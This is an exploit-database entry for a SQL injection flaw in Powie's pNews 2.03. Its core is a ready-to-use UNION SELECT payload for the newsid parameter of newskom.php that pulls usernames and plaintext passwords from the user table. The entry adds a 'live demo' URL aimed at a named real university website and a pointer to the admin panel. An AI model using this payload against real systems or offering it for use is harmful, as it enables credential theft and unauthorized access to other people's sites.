pNews 2.03 (newsid) Remote SQL Injection Vulnerability

2008-09-12T00:00:00
ID 1337DAY-ID-3660
Type zdt
Reporter r45c4l
Modified 2008-09-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
pNews 2.03 (newsid) Remote SQL Injection Vulnerability
======================================================


################################################################ 
# 
# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit

#
# Vendor:  http://www.powie.de

# 
#
###########################################################
#
# d0rk:n/a
#
###########################################################
 
     Exploit:-
	http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     
     
     Live Demo: 
	http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     Admin panel is at http://site.com/script/admin/ 

     The password in in plain text :P	

###########################################################
#
#  Bug discovered : 12 Sep.2008
###########################################################




#  0day.today [2018-01-09]  #